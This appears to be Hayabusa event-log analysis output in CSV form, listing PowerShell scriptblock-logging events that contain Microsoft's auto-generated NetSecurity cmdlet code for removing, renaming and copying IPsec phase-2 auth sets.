[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQ",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' -Alias '*' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"uery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' -Alias '*' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and 